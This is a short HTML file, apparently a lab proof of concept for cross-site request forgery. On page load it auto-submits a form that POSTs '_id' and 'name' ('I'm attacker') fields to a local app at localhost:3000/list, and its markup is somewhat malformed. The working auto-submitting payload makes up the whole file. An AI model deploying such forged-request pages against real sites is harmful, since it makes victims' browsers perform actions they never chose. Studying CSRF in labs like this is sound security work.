<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <body onload='document.CSRF.submit()'>
</head>
<body>
</body>
</html>

<form name="CSRF" action="http://localhost:3000/list" method="POST">
        id <input type="text" name="_id" value="hi">
        name <input type="text" name="name" value="I'm attacker">
        <button type="submit">Submit</button>
</form>
